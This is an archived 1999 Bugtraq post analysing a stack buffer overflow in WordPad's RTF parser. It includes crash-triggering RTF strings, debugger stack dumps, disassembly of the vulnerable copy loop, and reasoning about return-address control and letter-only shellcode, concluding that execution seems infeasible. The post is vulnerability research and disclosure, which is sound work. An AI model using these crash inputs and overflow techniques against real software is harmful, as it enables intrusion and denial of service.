[12684] in bugtraq

home help back first fref pref prev next nref lref last post

Re: WordPad/riched20.dll buffer overflow - Full Details

daemon@ATHENA.MIT.EDU (Solar Eclipse)
Mon Nov 22 17:04:20 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id:  <3837BDC36D.7BA1SOLARECLIPSE@smtp.softhome.net>
Date:         Sun, 21 Nov 1999 03:39:15 -0600
Reply-To: Solar Eclipse <solareclipse@SOFTHOME.NET>
From: Solar Eclipse <solareclipse@SOFTHOME.NET>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.BSF.4.10.9911190014340.83358-100000@Acrid.SchematiX.NET>

I kindly suggest using a fixed width font for your viewing pleasure.


Microsoft Wordpad Buffer Overflow


I. Introduction

The first report was from Pauli Ojanpera <pauli_ojanpera@HOTMAIL.COM>

	Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
	overflow problem with ".rtf"-files.

	Crashme.rtf :
	{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}

	A malicious document may probably abuse this to execute arbitary
	code. WordPad crashes with EIP=41414141.

Thomas Dullien <dullien@GMX.DE> did a very good research on this
buffer overflow. Unfortunately I received his vuln-dev post after I
was deep into the Wordpad code, so I already discovered most of the
details that he posted.

II. Research

     Ok, let's try to exploit this shit. First, try to crash Wordpad.
Create the following file:

{\rtf\AAAAAAAAAA(100 'A's)}

I am using SoftIce to inspect the situation after the crash.
First, take a look at the registers and the stack.

EIP=61616161
ESP=0012F044
EBP=61616161
                                  ebp      eip
0023:0012F024 0012F104 00000102 61616161 61616161   ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023   ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000   aaaaaaaa........

We can assume that EBP and EIP were popped from the stack and then RET 10 was
executed, decreasing the stack pointer.

To check if this is the case, try the following:

{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}

Wordpad crashes again. The regiters and the stack are as follows:

ESP=0012F054
EBP=6A6A6A6A 'jjjj'
EIP=6B6B6B6B 'kkkk'

                                  ebp      eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b   ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023   ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F   llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373   ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777   ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200   xxxxyyyyzzzz....

Yes, our assumption was correct. EBP gets its value from 0012F03C, and the
RET 10 instruction gets the EIP from 0012F040.

The buffer is probably 36 characters big, because 'jjjj' overwrites it.
By the way, notice that the characters are lowercased. This means that the
buffer is lowercased before the crash.

Let's try the following file (36 characters):

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}

It shouldn't crash, but it does. This is strange. Take a look at the registers
and the stack: (btw, do a quick check with 35 characters - Wordpad will not crash)

EIP=002E0033
ESP=0012F108
EBP=00200067

0023:0012F0E8 0012F294 6E002F02 00200067 002E0033   ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023   ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073   .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000    .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000   ................
0023:0012F138 0012F194 5F816876 00000014 00000000   ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064   ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850   ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168   .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8   .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC   :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8   xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....

This is even more strange. The EBP and EIP are not overwritten by our
string, but they are still smashed.

It's time to try to find where exactly is the code, guilty for this mess.
Notice that the EIP is overwritten and we don't know what code was executed
before the crash. Pauli Ojanpera posted that the crash was in riched20.dll.
Check the loaded DLL-s: there is no riched20.dll, but we see riched32.dll.
This sounds good! At what address is this DLL loaded?

:map32 riched32
Owner       Obj Name  Obj#  Address        Size      Type
RICHED32   .text      0001  001B:6C001000  00027284  CODE  RO

The code is loaded at 6C001000. Where is the buffer overflow? It is probably
located in some function in RICHED32.DLL. This function is probably called
>from some other function, which is also called from somewhere. We should
be able to see the return addresses for these previous calls on the stack.
Let's search for something that looks like a return address. At 0012F1D0 we see
the bytes 6C026B81. This looks like an address in RICHED32.DLL, doesn't it?
Go diassemble the bastard!

It is part of a function, starting at 6C026B0B and ending at 6C026B68 (I incuded
some more code in the middle, more about it later)

001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mox ecx, esi
001B:6C026B7C call 6C0267D1             ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret

Put a breakpoint in the beginning of this function and see what happens.
The 6C026B0B function is called 2 times and crashes the second time.
Trace it step by step, stepping over the calls. The function crashes
after the final RET instruction (located at 6C026B68)

Just before the crash the stack lools like this:

                 edi      esi  local_var  old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0  <- ret address

The POP EDI and POP ESI instructions restore these two registers (look at the
disassembly). Then the function restores the ESP (which is saved in EBP in the
beginning of the function). By trying this with a normal RTF file (not causing
a buffer overflow), we see that ESP becomes 0012F1E0. Then EBP is popped
>from the stack (it becomes 0012F40C) and the RET instruction returnes the
execution flow to 6C024DE0.

This is not the case with a fucked up RTF file. Everything is ok until we hit
the MOV ESP, EBP instruction. The value in the EBP register is not correct, thus
fucking up the ESP and causing a mess.

Ok, now we need to find where in the 6C026B0B function the EBP is smashed.
Put a breakpoint in the beginning of the function and trace it (without stepping
into the calls). The EBP in the beginning of the function is 0012F1E0. It
changes after the CALL 6C0267D1 instrcution.

Now we have the function that changes the EBP.

001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...

The stack of this function looks like this:

0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290   iii}.....k.l....
                         ebp      eip

At 0012F1D4 we have the return address. The EBP is saved at 0012F1D0 and
then the stack pointer is decremented by 36, leaving space for 36 bytes of
local variables. Remember this number? This is our buffer!

After some more tracing, we see that the saved ebp is changed because of
001B:6C0268E9 mov byte ptr [ebx], 00
executed right after the buffer is filled with our characters. This
is a NULL termination of the string, which changes the saved ebp from 0012F1D0
to 0012F100.

Let's do some more reverse engineering. From 6C0268AE to 6C0268DB we have
a loop that reads our string and copies it into the buffer.

001B:6C0268AE mov al, [ecx]             ; get the current char
001B:6C0268B0 inc ecx                   ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al          ; store the current char at 0012F1C8
001B:6C0268B4 mov [esi+1C], ecx         ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001         ; what the fuck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9               ; this is never executed
001B:6C0268C0 movzx eax, byte ptr [ebp-01]      ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01  ; is is 'A'-'Z' or 'a'-'z' ?
001B:6C0268CB jz 6C0268E9                       ; no -> go there
001B:6C0268CD mov al, [ebp-01]          ; get the current char
001B:6C0268D0 or al, 20                 ; make it lowercase
001B:6C0268D2 mov [ebx], al             ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c]         ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx         ; reached the end of the sting?
001B:6C0268DB jnz 6C0268AE              ; no -> loop again

ECX is a pointer to the memory location where the RTF file is loaded. It
points to the character that we are currently copying. EBX points to the
buffer. The buffer starts at 0012F1A8.

By the way, notice that the current charcacter is stored at 0012F1C8 (the
third line in the disassembly). This means that out buffer is only 32 bytes
long, and we have another local variable after it. This doesn't really matter,
because the copying process works even if we overwrite this variable (it
gets restored). If we put some shellcode there, we need to know that this
particular byte will be changed to the first character after the end of
the string. In our case, this is '}'

Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
memory location (6C00C6B8) we have an array of bytes, corresponding to each
ASCII value.

The array at 6C00C6B8
+00      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30      06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60      00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70      01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0      00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

The only ASCII characters that will pass the JZ condition after the TEST
instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII values 41-5A and 61-7A).
If any other character is reached, the copying is ended and the buffer is
NULL terminated.

Next we try really taking over the return address.

{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)}

'jjjj' overwrites the saved EBP and the return address becomes 'kkkk'. After
the overwritten return address, we have more As.

0023:0012F1A8 61616161 62626262 63636363 64646464   aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868   eeeeffffgggghhhh
0023:0012F1C8 7D696969 70707070 71717171 61616161   iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161   aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000   aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000   ................
0023:0012F2A8 00000000 000C1814 00000000 00000000   ................

At 0012F2AC we have a pointer to the current character in the file buffer.
ECX is saved to this location (referenced as esi+1C) before the copying, and
restored afterwards. This value is updated after every copied byte. If we
overwrite it, it will start pointing to a new memory location. The copy loop
will try to read the bytes to copy from there and probably crash. Even if we
somehow manage to overwrite this with a valid memory pointer, this will be
the last byte copied from our string.

This limits us to 216 'A's after the 'jjjjkkkk'.


III. Is an exploit possible ?

Exploiting this buffer overflow will be hard. May be not impossible, but very
hard. We have only 216 bytes to squeese our shell code in, and we can use
26 characters - the letters from 'a' to 'z'.

Writing a shell code with no nulls is hard, writing one only with letters is
almost impossible.

First, we need some way of pointing the return address to something usefull.
We cannot point it to the stack, because the stack address contains 'prohibited'
characters. After the RET instruction the ESP points to the second part of our
string (the one after 'jjjjkkkk'). We need a JMP ESP or CALL ESP instruction.
The usual approach is to look at the loaded DLL-s at the time of the crash and
to find one of these instructions at some memory location. Then we can point
the return address to this memory location and have it jump back to our shell
code. The problem is that we need the address of this memory location to
consist only of lowercase letters.

c:\>listdlls.exe wordpad

ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com

------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
  Base        Size      Version         Path
  0x029a0000  0x34000   4.00.1381.0096  C:\Program Files\Windows NT\Accessories\wordpad.exe
  0x77f60000  0x5e000   4.00.1381.0174  C:\WINNT\System32\ntdll.dll
  0x5f800000  0xee000   4.21.0000.7160  C:\WINNT\System32\MFC42u.DLL
  0x78000000  0x40000   6.00.8397.0000  C:\WINNT\system32\MSVCRT.dll
  0x77f00000  0x5e000   4.00.1381.0178  C:\WINNT\system32\KERNEL32.dll
  0x77ed0000  0x2c000   4.00.1381.0115  C:\WINNT\system32\GDI32.dll
  0x77e70000  0x54000   4.00.1381.0133  C:\WINNT\system32\USER32.dll
  0x77dc0000  0x3f000   4.00.1381.0203  C:\WINNT\system32\ADVAPI32.dll
  0x77e10000  0x57000   4.00.1381.0193  C:\WINNT\system32\RPCRT4.dll
  0x77d80000  0x32000   4.00.1381.0133  C:\WINNT\system32\comdlg32.dll
  0x70970000  0x1a8000  4.72.3110.0006  C:\WINNT\system32\SHELL32.dll
  0x70bd0000  0x44000   5.00.2314.1000  C:\WINNT\system32\SHLWAPI.dll
  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll
  0x77b20000  0xb6000   4.00.1381.0190  C:\WINNT\system32\ole32.dll
  0x76aa0000  0x6000    4.00.1371.0001  C:\WINNT\System32\INDICDLL.dll
  0x77c00000  0x18000   4.00.1381.0027  C:\WINNT\System32\WINSPOOL.DRV
  0x775a0000  0x14000   0.02.0000.0000  C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
  0x6c000000  0x2e000   4.00.0993.0004  C:\WINNT\System32\RICHED32.dll
  0x70400000  0x77000   5.00.2314.1000  C:\WINNT\System32\mlang.dll

These are the loaded DLLs that we can use. The perfect DLL would be the same on
Windows 95, 98, SE, NT 4 with all service packs and on Win2K. Unfortunately
such DLL is just a dream. Our choices are really limited. Looking at the base
addresses, we can eliminate most of the DLLs, because they don's have letter
addresses. This leaves us only with one DLL that we can use:

  0x71590000  0x87000   5.80.2314.1000  C:\WINNT\system32\COMCTL32.dll

We can only use the code in the range from from 71616161 to 7161707A.
After disassembling the DLL and looking at the code, we clearly see that there
is no JMP ESP or CALL ESP instruction.

There is no way to execute the shellcode.

Even if we could do it, making the shellcode do something usefull would be
pain in the ass. The restrictions are too harsh.

After the RET instruction, at ESP-50 we have a pointer to the beginning of the
buffer, where the raw file is loaded. This buffer holds the raw file
contents, so we can use NULLs and non-letter characters. Unfortunately, this
buffer is in the heap and we can not execute any code from there. We need to
copy the code to the stack first.

The whole situation sucks. At least the Micro$oft users are saved once
again! But not for long :-)



Solar Eclipse <solareclipse@phreedom.org>
www.phreedom.org

Win32 Security Consultant ;-> Hire me ! Will work for food!

home help back first fref pref prev next nref lref last post